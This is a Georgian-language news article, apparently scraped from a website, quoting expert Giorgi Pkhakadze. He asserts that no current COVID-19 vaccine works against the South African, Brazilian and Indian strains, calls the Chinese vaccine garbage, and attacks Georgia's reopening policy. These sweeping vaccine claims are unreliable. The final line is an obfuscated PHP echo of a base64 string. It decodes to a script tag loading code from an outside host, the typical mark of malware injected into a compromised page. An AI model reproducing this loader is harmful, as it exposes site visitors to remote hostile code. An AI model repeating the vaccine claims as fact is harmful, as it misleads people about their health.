celsiusi
ავერსი შნაიდერი
გაეროს გენერალური მდივნის მრჩეველი, საზოგადოებრივი ჯანდაცვის დამოუკიდებელი ექსპერტი, პროფესორი გიორგი ფხაკაძე ამბობს, რომ ისრაელში ჩატარდა კვლევა, ვინც იქ რეინფიცირებულია, ყველა არის ბრაზილიური შტამით, ანუ ფაიზერიც ვერ მუშაობს ამ შტამზე. 
 
მისივე თქმით, მსოფლიოში არის სამი ძალიან საშიში - სამხრეთ აფრიკული, ბრაზილიური და ინდური შატმები, რომელთა წინააღმდეგ არც ერთი ვაქცინა არ მუშაობს.
 
“ჩამოიტანეს ნაგავი ჩინური ვაქცინა, რომელიც ბრიტანულ შტამზე არ მუშაობს, საქართველოში კი უკვე 80%-ზე მეტი ბრიტანული შატმის გავრცელებაა, 3-4 კვირაში კი ქვეყანაში მხოლოდ ბრიტანული შტამის ცირკულირება იქნება; ეს არის გიორგი ფხაკაძის რეფერენსი - ასე ჩაწერეთ, პასუხს ვაგებ ჩემს სიტყვებზე. 
5 დღეა, დეპრესიაში ვარ, ისეთი ინფორმაციები მოდის, არ მინდოდა ლაპარაკი. გინდათ სიმართლე? ესაა - “დარხეული” გვაქვს ყველას, მთელ მსოფლიოს. ბოდიში ამ გამოთქმისთვის, არც ერთი ის ვაქცინა, რომელიც დღეს არის მსოფლიოში, უკვე ვერ გვიშველის. ყველა ვაქცინა მუშაობს ვუხანის ვირუსის წინააღმდეგ და მეტნაკლებად ბრიტანული შტამის წინააღმდეგ”- განაცხადა გიორგი ფხაკაძემ.
 
მისივე განცხადებით, 
“თუ ქვეყანაში გინდათ ვაქცინაციის გაკეთება, ჯერ ჩამოიტანეთ ვაქცინა - 3 მილიონი ვაქცინაა მინიმუმ საჭირო. თუ ჩვენ გვინდა, რომ საქართველოს მოზრდილი მოსახლეობის ანუ 18 წელზე ზევით მოსახლეობის 70% თუ გვინდა, იყოს დაცული, ამისთვის ამ მოსახლეობის 90% უნდა ავცრათ. ისე კი არა “შაში-ბეშივით” რომ კეთდება, 10 და 20 000, აქა-იქ, 2-3 თვეში უნდა გააკეთოთ სრულად მიყოლებით. დაიწყე, გააკეთე, დაამთავრე. ეს არის მათემატიკა და მეცნიერება. ეს არის ეპიდემიოლოგია! ნუ თამაშობთ ვაქცინობანას ქვეყანაში! 10 0000 და 20 0000 და თუნდაც 10 000  100 000 ვაქცინის  ჩამოტანა არის თვალებში ქვიშის შეყრა”, - ამბობს ფხაკაძე.
 
როგორც ფხაკაძე აღნიშნავს, უბედურება ისაა, რომ ახალი შტამები მოდის, რაც უკვე თურქეთში დაფიქსირდა, ბრაზილიური და სამხრეთ აფრიკული შტამი. ჩვენ საზღვრები ღია გვაქვს ამ ქვეყნებთან, რუსებს და ინდოელებს აქვთ მიმოსვლა ერთმანეთთან და ჩვენ ღია გვაქვს საზღვარი რუსეთთან.  
 
“რომ ჩავკეტეთ ინდოეთთან, ირიბი გზით ხომ შემოდიან მაინც ინდოეთში ნამყოფები სხვა ქვეყნებიდან? მსოფლიოში უმძიმესი მდგომარეობაა. საქართველო, მე მგონი, ერთადერთი ქვეყანაა, ტაშფანდურია, გახსნილია ყველაფერი და კიდევ უფრო გავიხსნათო. ბიზნესმენები გამოდიან, კიდევ ერთ ლოქდაუნს ვერ გავუძლებთო. მაინცდამაინც ყოველი მეორე უნდა მოკვდეს, რომ აღიქვათ საშიშროება? ძლივს იყო ჩამოწეული ვირუსი იანვარში, ეს უნდა შეგვენარჩუნებინა. როცა ქვეყანა ერთ დღეში გახსენით, ხომ ვთქვი იმ დღეს, ყველაზე დიდი მავნებელია დაავადებათ კონტროლის ცენტრი-მეთქი. გასაგებია, პრემიერი ახალია და უნდა, ცვლილებები აჩვენოს ხალხს, მაგრამ შენ რომ ხარ სფეროს წარმომადგენელი და პროფესიონალი თუ ხარ, უნდა გამოხვიდე და თქვა, რომ არ შეიძლება, უნდა აუხსნა, რომ ეს რისკია და დაასაბუთო, დაგიჯერებენ. მაგრამ რაც ხდება, ეს არის არაპროფესიონალიზმი და კორუფცია ერთად!”- განაცხადა ფხაკაძემ.
20267
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");